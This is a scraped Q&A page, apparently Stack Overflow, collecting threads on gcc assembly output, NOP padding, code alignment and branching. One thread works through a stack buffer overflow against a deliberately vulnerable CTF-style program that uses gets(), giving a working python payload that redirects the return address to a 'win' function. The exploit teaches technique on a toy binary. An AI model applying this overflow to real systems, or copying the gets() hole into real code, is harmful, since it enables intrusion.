Why is gcc using two stores (`MOV %reg, (mem)`) instead of just one? - gcc

Compiling the following with gcc (version: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0):
if(n >= m)
{
n = 0;
}
The code output looks like this:
23bd5: 48 3b 93 10 03 00 00 cmp 0x310(%rbx),%rdx
23bdc: 48 89 93 20 03 00 00 mov %rdx,0x320(%rbx)
23be3: 72 0d jb 23bf2
23be5: 48 c7 83 20 03 00 00 movq $0x0,0x320(%rbx)
23bec: 00 00 00 00
23bf0: 31 d2 xor %edx,%edx
23bf2: ....
I'm wondering why the compiler decides to use what looks like a rather expensive set of instructions. I would have used the following instead:
cmp 0x310(%rbx), %rdx
jb .L1
xor %edx, %edx
.L1
mov $rdx, 0x320(%rbx)
Could it be because the XOR takes so much time that it would stale before the store? Or is it that the first store doesn't really happen if the processor detects the second store? Or is it that the second store is nearly instant because it will use the L1 cache (presumably)?
(that being said, the store could happen later as other instructions coming after could safely be moved before that store).

Related

Why do I find some never called instructions nopl, nopw after ret or jmp in GCC compiled code? [duplicate]

I've been working with C for a short while and very recently started to get into ASM. When I compile a program:
int main(void)
{
int a = 0;
a += 1;
return 0;
}
The objdump disassembly has the code, but nops after the ret:
...
08048394 <main>:
8048394: 55 push %ebp
8048395: 89 e5 mov %esp,%ebp
8048397: 83 ec 10 sub $0x10,%esp
804839a: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%ebp)
80483a1: 83 45 fc 01 addl $0x1,-0x4(%ebp)
80483a5: b8 00 00 00 00 mov $0x0,%eax
80483aa: c9 leave
80483ab: c3 ret
80483ac: 90 nop
80483ad: 90 nop
80483ae: 90 nop
80483af: 90 nop
...
From what I learned nops do nothing, and since after ret wouldn't even be executed.
My question is: why bother? Couldn't ELF(linux-x86) work with a .text section(+main) of any size?
I'd appreciate any help, just trying to learn.
First of all, gcc doesn't always do this. The padding is controlled by -falign-functions, which is automatically turned on by -O2 and -O3:
-falign-functions
-falign-functions=n
Align the start of functions to the next power-of-two greater than n, skipping up to n bytes. For instance,
-falign-functions=32 aligns functions to the next 32-byte boundary, but -falign-functions=24 would align to the next 32-byte boundary only
if this can be done by skipping 23 bytes or less.
-fno-align-functions and -falign-functions=1 are equivalent and mean that functions will not be aligned.
Some assemblers only support this flag when n is a power of two; in
that case, it is rounded up.
If n is not specified or is zero, use a machine-dependent default.
Enabled at levels -O2, -O3.
There could be multiple reasons for doing this, but the main one on x86 is probably this:
Most processors fetch instructions in aligned 16-byte or 32-byte blocks. It can be
advantageous to align critical loop entries and subroutine entries by 16 in order to minimize
the number of 16-byte boundaries in the code. Alternatively, make sure that there is no 16-byte boundary in the first few instructions after a critical loop entry or subroutine entry.
(Quoted from "Optimizing subroutines in assembly
language" by Agner Fog.)
edit: Here is an example that demonstrates the padding:
// align.c
int f(void) { return 0; }
int g(void) { return 0; }
When compiled using gcc 4.4.5 with default settings, I get:
align.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: b8 00 00 00 00 mov $0x0,%eax
9: c9 leaveq
a: c3 retq
000000000000000b <g>:
b: 55 push %rbp
c: 48 89 e5 mov %rsp,%rbp
f: b8 00 00 00 00 mov $0x0,%eax
14: c9 leaveq
15: c3 retq
Specifying -falign-functions gives:
align.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: b8 00 00 00 00 mov $0x0,%eax
9: c9 leaveq
a: c3 retq
b: eb 03 jmp 10 <g>
d: 90 nop
e: 90 nop
f: 90 nop
0000000000000010 <g>:
10: 55 push %rbp
11: 48 89 e5 mov %rsp,%rbp
14: b8 00 00 00 00 mov $0x0,%eax
19: c9 leaveq
1a: c3 retq
This is done to align the next function by 8, 16 or 32-byte boundary.
From “Optimizing subroutines in assembly language” by A.Fog:
11.5 Alignment of code
Most microprocessors fetch code in aligned 16-byte or 32-byte blocks. If an importantsubroutine entry or jump label happens to be near the end of a 16-byte block then themicroprocessor will only get a few useful bytes of code when fetching that block of code. Itmay have to fetch the next 16 bytes too before it can decode the first instructions after thelabel. This can be avoided by aligning important subroutine entries and loop entries by 16.
[...]
Aligning a subroutine entry is as simple as putting as many
NOP
's as needed before thesubroutine entry to make the address divisible by 8, 16, 32 or 64, as desired.
As far as I remember, instructions are pipelined in cpu and different cpu blocks (loader, decoder and such) process subsequent instructions. When RET instructions is being executed, few next instructions are already loaded into cpu pipeline. It's a guess, but you can start digging here and if you find out (maybe the specific number of NOPs that are safe, share your findings please.

Buffer overflow: overrwrite CH

I have a program that is vulnerable to buffer overflow. The function that is vulnerable takes 2 arguments. The first is a standard 4 bytes. For the second however, the program performs the following:
xor ch, 0
...
cmp dword ptr [ebp+10h], 0F00DB4BE
Now, if I supply 2 different 4 byte argument, as part of my exploit, i.e. ABCDEFGH (assume ABCD is the first argument, EFGH the second), CH becomes G. So naturally I thought about crafting the following (assume ABCD is right):
ABCD\x00\x0d\x00\x00
What happens however, is that nullbutes seem to be ignored! Sending the above results in CH = 0 and CL = 0xd. This happens no matter where I put \x0d i.e.:
ABCD\x0d\x00\x00\x00
ABCD\x00\x0d\x00\x00
ABCD\x00\x00\x0d\x00
ABCD\x00\x00\x00\x0d
all yield that same behavior.
How can I proceed to only overwrite CH while leaving the rest of ECX as null?
EDIT: see my own answer below. The short version is that bash ignores null bytes and it explains, partially, why the exploit didn't work locally. The exact reason can be found here. Thanks to Michael Petch for pointing it out!
Source:
#include <stdio.h>
#include <stdlib.h>
void win(long long arg1, int arg2)
{
if (arg1 != 0x14B4DA55 || arg2 != 0xF00DB4BE)
{
puts("Close, but not quite.");
exit(1);
}
printf("You win!\n");
}
void vuln()
{
char buf[16];
printf("Type something>");
gets(buf);
printf("You typed %s!\n", buf);
}
int main()
{
/* Disable buffering on stdout */
setvbuf(stdout, NULL, _IONBF, 0);
vuln();
return 0;
}
The relevant part of objdump's disassembly of the executable is:
080491c2 <win>:
80491c2: 55 push %ebp
80491c3: 89 e5 mov %esp,%ebp
80491c5: 81 ec 28 01 00 00 sub $0x128,%esp
80491cb: 8b 4d 08 mov 0x8(%ebp),%ecx
80491ce: 89 8d e0 fe ff ff mov %ecx,-0x120(%ebp)
80491d4: 8b 4d 0c mov 0xc(%ebp),%ecx
80491d7: 89 8d e4 fe ff ff mov %ecx,-0x11c(%ebp)
80491dd: 8b 8d e0 fe ff ff mov -0x120(%ebp),%ecx
80491e3: 81 f1 55 da b4 14 xor $0x14b4da55,%ecx
80491e9: 89 c8 mov %ecx,%eax
80491eb: 8b 8d e4 fe ff ff mov -0x11c(%ebp),%ecx
80491f1: 80 f5 00 xor $0x0,%ch
80491f4: 89 ca mov %ecx,%edx
80491f6: 09 d0 or %edx,%eax
80491f8: 85 c0 test %eax,%eax
80491fa: 75 09 jne 8049205 <win+0x43>
80491fc: 81 7d 10 be b4 0d f0 cmpl $0xf00db4be,0x10(%ebp)
8049203: 74 1a je 804921f <win+0x5d>
8049205: 83 ec 0c sub $0xc,%esp
8049208: 68 08 a0 04 08 push $0x804a008
804920d: e8 4e fe ff ff call 8049060 <puts#plt>
8049212: 83 c4 10 add $0x10,%esp
8049215: 83 ec 0c sub $0xc,%esp
8049218: 6a 01 push $0x1
804921a: e8 51 fe ff ff call 8049070 <exit#plt>
804921f: 83 ec 0c sub $0xc,%esp
8049222: 68 1e a0 04 08 push $0x804a01e
8049227: e8 34 fe ff ff call 8049060 <puts#plt>
804922c: 83 c4 10 add $0x10,%esp
804922f: 83 ec 08 sub $0x8,%esp
8049232: 68 27 a0 04 08 push $0x804a027
8049237: 68 29 a0 04 08 push $0x804a029
804923c: e8 5f fe ff ff call 80490a0 <fopen#plt>
8049241: 83 c4 10 add $0x10,%esp
8049244: 89 45 f4 mov %eax,-0xc(%ebp)
8049247: 83 7d f4 00 cmpl $0x0,-0xc(%ebp)
804924b: 75 12 jne 804925f <win+0x9d>
804924d: 83 ec 0c sub $0xc,%esp
8049250: 68 34 a0 04 08 push $0x804a034
8049255: e8 06 fe ff ff call 8049060 <puts#plt>
804925a: 83 c4 10 add $0x10,%esp
804925d: eb 31 jmp 8049290 <win+0xce>
804925f: 83 ec 04 sub $0x4,%esp
8049262: ff 75 f4 pushl -0xc(%ebp)
8049265: 68 00 01 00 00 push $0x100
804926a: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax
8049270: 50 push %eax
8049271: e8 da fd ff ff call 8049050 <fgets#plt>
8049276: 83 c4 10 add $0x10,%esp
8049279: 83 ec 08 sub $0x8,%esp
804927c: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax
8049282: 50 push %eax
8049283: 68 86 a0 04 08 push $0x804a086
8049288: e8 a3 fd ff ff call 8049030 <printf#plt>
804928d: 83 c4 10 add $0x10,%esp
8049290: 90 nop
8049291: c9 leave
8049292: c3 ret
08049293 <vuln>:
8049293: 55 push %ebp
8049294: 89 e5 mov %esp,%ebp
8049296: 83 ec 18 sub $0x18,%esp
8049299: 83 ec 0c sub $0xc,%esp
804929c: 68 90 a0 04 08 push $0x804a090
80492a1: e8 8a fd ff ff call 8049030 <printf#plt>
80492a6: 83 c4 10 add $0x10,%esp
80492a9: 83 ec 0c sub $0xc,%esp
80492ac: 8d 45 e8 lea -0x18(%ebp),%eax
80492af: 50 push %eax
80492b0: e8 8b fd ff ff call 8049040 <gets#plt>
80492b5: 83 c4 10 add $0x10,%esp
80492b8: 83 ec 08 sub $0x8,%esp
80492bb: 8d 45 e8 lea -0x18(%ebp),%eax
80492be: 50 push %eax
80492bf: 68 a0 a0 04 08 push $0x804a0a0
80492c4: e8 67 fd ff ff call 8049030 <printf#plt>
80492c9: 83 c4 10 add $0x10,%esp
80492cc: 90 nop
80492cd: c9 leave
80492ce: c3 ret
080492cf <main>:
80492cf: 8d 4c 24 04 lea 0x4(%esp),%ecx
80492d3: 83 e4 f0 and $0xfffffff0,%esp
80492d6: ff 71 fc pushl -0x4(%ecx)
80492d9: 55 push %ebp
80492da: 89 e5 mov %esp,%ebp
80492dc: 51 push %ecx
80492dd: 83 ec 04 sub $0x4,%esp
80492e0: a1 34 c0 04 08 mov 0x804c034,%eax
80492e5: 6a 00 push $0x0
80492e7: 6a 02 push $0x2
80492e9: 6a 00 push $0x0
80492eb: 50 push %eax
80492ec: e8 9f fd ff ff call 8049090 <setvbuf#plt>
80492f1: 83 c4 10 add $0x10,%esp
80492f4: e8 9a ff ff ff call 8049293 <vuln>
80492f9: b8 00 00 00 00 mov $0x0,%eax
80492fe: 8b 4d fc mov -0x4(%ebp),%ecx
8049301: c9 leave
8049302: 8d 61 fc lea -0x4(%ecx),%esp
8049305: c3 ret
It is unclear why you are hung up on the value in ECX or the xor ch, 0 instruction inside the win function. From the C code it is clear that the check for a win requires that the 64-bit (long long) arg1 to be 0x14B4DA55 and arg2 needs to be 0xF00DB4BE. When that condition is met it will print You win!
We need some kind of buffer exploit that has the capability to execute the win function and make it appear that it is being passed a first argument (64-bit long long) and a 32-bit int as a second parameter.
The most obvious way to pull this off is overrun buf in function vuln that strategically overwrites the return address and replaces it with the address of win. In the disassembled output win is at 0x080491c2. We will need to write 0x080491c2 followed by some dummy value for a return address, followed by the 64-bit value 0x14B4DA55 (same as 0x0000000014B4DA55 ) followed by the 32-bit value 0xF00DB4BE.
The dummy value for a return address is needed because we need to simulate a function call on the stack. We won't be issuing a call instruction so we have to make it appear as if one had been done. The goal is to print You win! whether the program crashes after that isn't relevant.
The return address (win), arg1, and arg2 will have to be stored as bytes in reverse order since the x86 processors are little endian.
The last big question is how many bytes do we have to feed to gets to overrun the buffer to reach the return address? You could use trial and error (bruteforce) to figure this out, but we can look at the disassembly of the call to gets:
80492ac: 8d 45 e8 lea -0x18(%ebp),%eax
80492af: 50 push %eax
80492b0: e8 8b fd ff ff call 8049040 <gets#plt
LEA is being used to compute the address (Effective Address) of buf on the stack and passing that as the first argument to gets. 0x18 is 24 bytes (decimal). Although buf was defined to be 16 bytes in length the compiler also allocated additional space for alignment purposes. We have to add an additional 4 bytes to account for the fact that the function prologue pushed EBP on the stack. That is a total of 28 bytes (24+4) to reach the position of the return address on the stack.
Using PYTHON to generate the input sequence is common in many tutorials. Embedding NUL(\0) characters in a shell string directly may cause a shell program to prematurely terminate a string at the NUL byte (an issue that people have when using BASH). We can pipe the byte sequence to our program using something like:
python -c 'print "A"*28+"\xc2\x91\x04\x08" \
+"B"*4+"\x55\xda\xb4\x14\x00\x00\x00\x00\xbe\xb4\x0d\xf0"' | ./progname
Where progname is the name of your executable. When run it should appear similar to:
Type something>You typed AAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBUڴ!
You win!
Segmentation fault
Note: the 4 characters making up the return address between the A's and B's are unprintable so they don't appear in the console output but they are still present as well as all the other unprintable characters.
As a limited answer to my own question, specifically regarding why null bytes are ignored:
It seems to be an issue with bash seemingly ignoring nullbytes
Many other of my peers faced the same problem when writing the exploit. It would work on the server but not locally when using gdb for example. Bash would simply disregard the nullbytes and thus \x55\xda\xb4\x14\x00\x00\x00\x00\xbe\xb4\x0d\xf0 would be read in as \x55\xda\xb4\x14\xbe\xb4\x0d\xf0. The exact reason why it behaves that way still eludes me but it's a good thing to keep in mind!

Objdump disassemble doesn't match source code

I'm investigating the execution flow of a OpenMP program linked to libgomp. It uses the #pragma omp parallel for. I already know that this construct becomes, among other things, a call to GOMP_parallel function, which is implemented as follows:
void
GOMP_parallel (void (*fn) (void *), void *data,
unsigned num_threads, unsigned int flags)
{
num_threads = gomp_resolve_num_threads (num_threads, 0);
gomp_team_start (fn, data, num_threads, flags, gomp_new_team (num_threads));
fn (data);
ialias_call (GOMP_parallel_end) ();
}
When executing objdump -d on libgomp, GOMP_parallel appears as:
000000000000bc80 <GOMP_parallel##GOMP_4.0>:
bc80: 41 55 push %r13
bc82: 41 54 push %r12
bc84: 41 89 cd mov %ecx,%r13d
bc87: 55 push %rbp
bc88: 53 push %rbx
bc89: 48 89 f5 mov %rsi,%rbp
bc8c: 48 89 fb mov %rdi,%rbx
bc8f: 31 f6 xor %esi,%esi
bc91: 89 d7 mov %edx,%edi
bc93: 48 83 ec 08 sub $0x8,%rsp
bc97: e8 d4 fd ff ff callq ba70 <GOMP_ordered_end##GOMP_1.0+0x70>
bc9c: 41 89 c4 mov %eax,%r12d
bc9f: 89 c7 mov %eax,%edi
bca1: e8 ca 37 00 00 callq f470 <omp_in_final##OMP_3.1+0x2c0>
bca6: 44 89 e9 mov %r13d,%ecx
bca9: 44 89 e2 mov %r12d,%edx
bcac: 48 89 ee mov %rbp,%rsi
bcaf: 48 89 df mov %rbx,%rdi
bcb2: 49 89 c0 mov %rax,%r8
bcb5: e8 16 39 00 00 callq f5d0 <omp_in_final##OMP_3.1+0x420>
bcba: 48 89 ef mov %rbp,%rdi
bcbd: ff d3 callq *%rbx
bcbf: 48 83 c4 08 add $0x8,%rsp
bcc3: 5b pop %rbx
bcc4: 5d pop %rbp
bcc5: 41 5c pop %r12
bcc7: 41 5d pop %r13
bcc9: e9 32 ff ff ff jmpq bc00 <GOMP_parallel_end##GOMP_1.0>
bcce: 66 90 xchg %ax,%ax
First, there isn't any call to GOMP_ordered_end in the source code of GOMP_parallel, for example. Second, that function consists of:
void
GOMP_ordered_end (void)
{
}
According the the objdump output, this function starts at ba00 and finishes at bbbd. How could it have so much code in a function that is empty? By the way, there is comment in the source code of libgomp saying that it should appear only when using the ORDERED construct (as the name suggests), which is not the case of my test.
Finally, the main concern here for me is: why does the source code differ so much from the disassembly? Why, for example, isn't there any mention to gomp_team_start in the assembly?
The system has gcc version 5.4.0
According the the objdump output, this function starts at ba00 and finishes at bbbd.
How could it have so much code in a function that is empty?
The function itself is small but GCC just used some additional bytes to align the next function and store some static data (probly used by other functions in this file). Here's what I see in local ordered.o:
00000000000003b0 <GOMP_ordered_end>:
3b0: f3 c3 repz retq
3b2: 66 66 66 66 66 2e 0f data32 data32 data32 data32 nopw %cs:0x0(%rax,%rax,1)
3b9: 1f 84 00 00 00 00 00
First, there isn't any call to GOMP_ordered_end in the source code of GOMP_parallel, for example.
Don't get distracted by GOMP_ordered_end##GOMP_1.0+0x70 mark in assembly code. All it says is that this calls some local library function (for which objdump didn't find any symbol info) which happens to be located 112 bytes after GOMP_ordered_end. This is most likely gomp_resolve_num_threads.
Why, for example, isn't there any mention to gomp_team_start in the assembly?
Hm, this looks pretty much like it:
bcb5: e8 16 39 00 00 callq f5d0 <omp_in_final##OMP_3.1+0x420>

Why does loop alignment on 32 byte make code faster?

Look at this code:
one.cpp:
bool test(int a, int b, int c, int d);
int main() {
volatile int va = 1;
volatile int vb = 2;
volatile int vc = 3;
volatile int vd = 4;
int a = va;
int b = vb;
int c = vc;
int d = vd;
int s = 0;
__asm__("nop"); __asm__("nop"); __asm__("nop"); __asm__("nop");
__asm__("nop"); __asm__("nop"); __asm__("nop"); __asm__("nop");
__asm__("nop"); __asm__("nop"); __asm__("nop"); __asm__("nop");
__asm__("nop"); __asm__("nop"); __asm__("nop"); __asm__("nop");
for (int i=0; i<2000000000; i++) {
s += test(a, b, c, d);
}
return s;
}
two.cpp:
bool test(int a, int b, int c, int d) {
// return a == d || b == d || c == d;
return false;
}
There are 16 nops in one.cpp. You can comment/decomment them to change alignment of the loop's entry point between 16 and 32. I've compiled them with g++ one.cpp two.cpp -O3 -mtune=native.
Here are my questions:
the 32-aligned version is faster than the 16-aligned version. On Sandy Bridge, the difference is 20%; on Haswell, 8%. Why is the difference?
with the 32-aligned version, the code runs the same speed on Sandy Bridge, doesn't matter which return statement is in two.cpp. I thought the return false version should be faster at least a little bit. But no, exactly the same speed!
If I remove volatiles from one.cpp, code becomes slower (Haswell: before: ~2.17 sec, after: ~2.38 sec). Why is that? But this only happens, when the loop aligned to 32.
The fact that 32-aligned version is faster, is strange to me, because Intel® 64 and IA-32 Architectures
Optimization Reference Manual says (page 3-9):
Assembly/Compiler Coding Rule 12. (M impact, H generality) All branch
targets should be 16- byte aligned.
Another little question: is there any tricks to make only this loop 32-aligned (so rest of the code could keep using 16-byte alignment)?
Note: I've tried compilers gcc 6, gcc 7 and clang 3.9, same results.
Here's the code with volatile (the code is the same for 16/32 aligned, just the address differ):
0000000000000560 <main>:
560: 41 57 push r15
562: 41 56 push r14
564: 41 55 push r13
566: 41 54 push r12
568: 55 push rbp
569: 31 ed xor ebp,ebp
56b: 53 push rbx
56c: bb 00 94 35 77 mov ebx,0x77359400
571: 48 83 ec 18 sub rsp,0x18
575: c7 04 24 01 00 00 00 mov DWORD PTR [rsp],0x1
57c: c7 44 24 04 02 00 00 mov DWORD PTR [rsp+0x4],0x2
583: 00
584: c7 44 24 08 03 00 00 mov DWORD PTR [rsp+0x8],0x3
58b: 00
58c: c7 44 24 0c 04 00 00 mov DWORD PTR [rsp+0xc],0x4
593: 00
594: 44 8b 3c 24 mov r15d,DWORD PTR [rsp]
598: 44 8b 74 24 04 mov r14d,DWORD PTR [rsp+0x4]
59d: 44 8b 6c 24 08 mov r13d,DWORD PTR [rsp+0x8]
5a2: 44 8b 64 24 0c mov r12d,DWORD PTR [rsp+0xc]
5a7: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
5ac: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
5b3: 00 00 00
5b6: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
5bd: 00 00 00
5c0: 44 89 e1 mov ecx,r12d
5c3: 44 89 ea mov edx,r13d
5c6: 44 89 f6 mov esi,r14d
5c9: 44 89 ff mov edi,r15d
5cc: e8 4f 01 00 00 call 720 <test(int, int, int, int)>
5d1: 0f b6 c0 movzx eax,al
5d4: 01 c5 add ebp,eax
5d6: 83 eb 01 sub ebx,0x1
5d9: 75 e5 jne 5c0 <main+0x60>
5db: 48 83 c4 18 add rsp,0x18
5df: 89 e8 mov eax,ebp
5e1: 5b pop rbx
5e2: 5d pop rbp
5e3: 41 5c pop r12
5e5: 41 5d pop r13
5e7: 41 5e pop r14
5e9: 41 5f pop r15
5eb: c3 ret
5ec: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
Without volatile:
0000000000000560 <main>:
560: 55 push rbp
561: 31 ed xor ebp,ebp
563: 53 push rbx
564: bb 00 94 35 77 mov ebx,0x77359400
569: 48 83 ec 08 sub rsp,0x8
56d: 66 0f 1f 84 00 00 00 nop WORD PTR [rax+rax*1+0x0]
574: 00 00
576: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
57d: 00 00 00
580: b9 04 00 00 00 mov ecx,0x4
585: ba 03 00 00 00 mov edx,0x3
58a: be 02 00 00 00 mov esi,0x2
58f: bf 01 00 00 00 mov edi,0x1
594: e8 47 01 00 00 call 6e0 <test(int, int, int, int)>
599: 0f b6 c0 movzx eax,al
59c: 01 c5 add ebp,eax
59e: 83 eb 01 sub ebx,0x1
5a1: 75 dd jne 580 <main+0x20>
5a3: 48 83 c4 08 add rsp,0x8
5a7: 89 e8 mov eax,ebp
5a9: 5b pop rbx
5aa: 5d pop rbp
5ab: c3 ret
5ac: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
This doesn't answer point 2 (return a == d || b == d || c == d; being the same speed as return false). That's still a maybe-interesting question, since that must compile multiple to uop-cache lines of instructions.
The fact that 32-aligned version is faster, is strange to me, because [Intel's manual says to align to 16]
That optimization-guide advice is a very general guideline, and definitely doesn't mean that larger never helps. Usually it doesn't, and padding to 32 would be more likely to hurt than help. (I-cache misses, ITLB misses, and more code bytes to load from disk).
In fact, 16B alignment is rarely necessary, especially on CPUs with a uop cache. For a small loop that can run from the loop buffer, it alignment is usually totally irrelevant.
(Skylake microcode updates disabled the loop buffer to work around a partial-register AH-merging bug, SKL150. This creates problems for tiny loops that span a 32-byte boundary, only running one iteration per 2 clocks, instead of the one iteration per 1.5 clocks you might get from a 6 uop loop on Haswell, or on SKL with older microcode. The LSD is not re-enabled until Ice Lake, broken in Kaby/Coffee/Comet Lake which are the same microarchitecture as SKL/SKX.)
Another SKL erratum workaround created another worse code-alignment pothole: How can I mitigate the impact of the Intel jcc erratum on gcc?
16B is still not bad as a broad recommendation, but it doesn't tell you everything you need to know to understand one specific case on a couple of specific CPUs.
Compilers usually default to aligning loop branches and function entry-points, but usually don't align other branch targets. The cost of executing a NOP (and code bloat) is often larger than the likely cost of an unaligned non-loop branch target.
Code alignment has some direct and some indirect effects. The direct effects include the uop cache on Intel SnB-family. For example, see Branch alignment for loops involving micro-coded instructions on Intel SnB-family CPUs.
Another section of Intel's optimization manual goes into some detail about how the uop cache works:
2.3.2.2 Decoded ICache:
All micro-ops in a Way (uop cache line) represent instructions which are statically contiguous in the code and have their EIPs within the
same aligned 32-byte region. (I think this means an instruction that
extends past the boundary goes in the uop cache for the block
containing its start, rather than end. Spanning instructions have to
go somewhere, and the branch target address that would run the
instruction is the start of the insn, so it's most useful to put it in
a line for that block).
A multi micro-op instruction cannot be split across Ways.
An instruction which turns on the MSROM consumes an entire Way.
Up to two branches are allowed per Way.
A pair of macro-fused instructions is kept as one micro-op.
See also Agner Fog's microarch guide. He adds:
An unconditional jump or call always ends a μop cache line
lots of other stuff that that probably isn't relevant here.
Also, that if your code doesn't fit in the uop cache, it can't run from the loop buffer.
The indirect effects of alignment include:
larger/smaller code-size (L1I cache misses, TLB). Not relevant for your test
which branches alias each other in the BTB (Branch Target Buffer).
If I remove volatiles from one.cpp, code becomes slower. Why is that?
The larger instructions push the last instruction into the loop across a 32B boundary:
59e: 83 eb 01 sub ebx,0x1
5a1: 75 dd jne 580 <main+0x20>
So if you aren't running from the loop buffer (LSD), then without volatile one of the uop-cache fetch cycles gets only 1 uop.
If sub/jne macro-fuses, this might not apply. And I think only crossing a 64B boundary would break macro-fusion.
Also, those aren't real addresses. Have you checked what the addresses are after linking? There could be a 64B boundary there after linking, if the text section has less than 64B alignment.
Also related to 32-byte boundaries, the JCC erratum disables the uop cache for blocks where a branch (including macro-fused ALU+JCC) includes the last byte of the line, on Skylake CPUs.
How can I mitigate the impact of the Intel jcc erratum on gcc?
Sorry I haven't actually tested this to say more about this specific case. The point is, when you bottleneck on the front-end from stuff like having a call/ret inside a tight loop, alignment becomes important and can get is extremely complex. Boundary-crossing or not for all future instructions is affected. Do not expect it to be simple. If you've read my other answers, you'll know I'm not usually the kind of person to say "it's too complicated to fully explain", but alignment can be that way.
See also Code alignment in one object file is affecting the performance of a function in another object file
In your case, make sure tiny functions inline. Use link-time optimization if your code-base has any important tiny functions in separate .c files instead of in a .h where they can inline. Or change your code to put them in a .h.

Why are ternary and logical operators more efficient than if branches?

I stumbled upon this question/answer which mentions that in most languages, logical operators such as:
x == y && doSomething();
can be faster than doing the same thing with an if branch:
if(x == y) {
doSomething();
}
Similarly, it says that the ternary operator:
x = y == z ? 0 : 1
is usually faster than using an if branch:
if(y == z) {
x = 0;
} else {
x = 1;
}
This got me Googling, which led me to this fantastic answer which explains branch prediction.
Basically, what it says is that the CPU operates at very fast speeds, and rather than slowing down to compute every if branch, it tries to guess what outcome will take place and places the appropriate instructions in its pipeline. But if it makes the wrong guess, it will have to back up and recompute the appropriate instructions.
But this still doesn't explain to me why logical operators or the ternary operator are treated differently than if branches. Since the CPU doesn't know the outcome of x == y, shouldn't it still have to guess whether to place the call to doSomething() (and therefore, all of doSomething's code) into its pipeline? And, therefore, back up if its guess was incorrect? Similarly, for the ternary operator, shouldn't the CPU have to guess whether y == z will evaluate to true when determining what to store in x, and back up if its guess was wrong?
I don't understand why if branches are treated any differently by the compiler than any other statement which is conditional. Shouldn't all conditionals be evaluated the same way?
Short answer - it simply isn't. While helping branch prediction could improve you performance - using this as a part a logical statement doesn't change the compiled code.
If you want to help branch prediction use __builtin_expect (for GNU)
To emphasize let's compare the compiler output:
#include <stdio.h>
int main(){
int foo;
scanf("%d", &foo); /*Needed to eliminate optimizations*/
#ifdef IF
if (foo)
printf("Foo!");
#else
foo && printf("Foo!");
#endif
return 0;
}
For gcc -O3 branch.c -DIF
We get:
0000000000400540 <main>:
400540: 48 83 ec 18 sub $0x18,%rsp
400544: 31 c0 xor %eax,%eax
400546: bf 68 06 40 00 mov $0x400668,%edi
40054b: 48 8d 74 24 0c lea 0xc(%rsp),%rsi
400550: e8 e3 fe ff ff callq 400438 <__isoc99_scanf#plt>
400555: 8b 44 24 0c mov 0xc(%rsp),%eax
400559: 85 c0 test %eax,%eax #This is the relevant part
40055b: 74 0c je 400569 <main+0x29>
40055d: bf 6b 06 40 00 mov $0x40066b,%edi
400562: 31 c0 xor %eax,%eax
400564: e8 af fe ff ff callq 400418 <printf#plt>
400569: 31 c0 xor %eax,%eax
40056b: 48 83 c4 18 add $0x18,%rsp
40056f: c3 retq
And for gcc -O3 branch.c
0000000000400540 <main>:
400540: 48 83 ec 18 sub $0x18,%rsp
400544: 31 c0 xor %eax,%eax
400546: bf 68 06 40 00 mov $0x400668,%edi
40054b: 48 8d 74 24 0c lea 0xc(%rsp),%rsi
400550: e8 e3 fe ff ff callq 400438 <__isoc99_scanf#plt>
400555: 8b 44 24 0c mov 0xc(%rsp),%eax
400559: 85 c0 test %eax,%eax
40055b: 74 0c je 400569 <main+0x29>
40055d: bf 6b 06 40 00 mov $0x40066b,%edi
400562: 31 c0 xor %eax,%eax
400564: e8 af fe ff ff callq 400418 <printf#plt>
400569: 31 c0 xor %eax,%eax
40056b: 48 83 c4 18 add $0x18,%rsp
40056f: c3 retq
This is exactly the same code.
The question you linked to measures performance for JAVAScript. Note that there it may be interpreted (since Java script is interpreted or JIT depending on the version) to something different for the two cases.
Anyway JavaScript is not the best for learning about performance.

Resources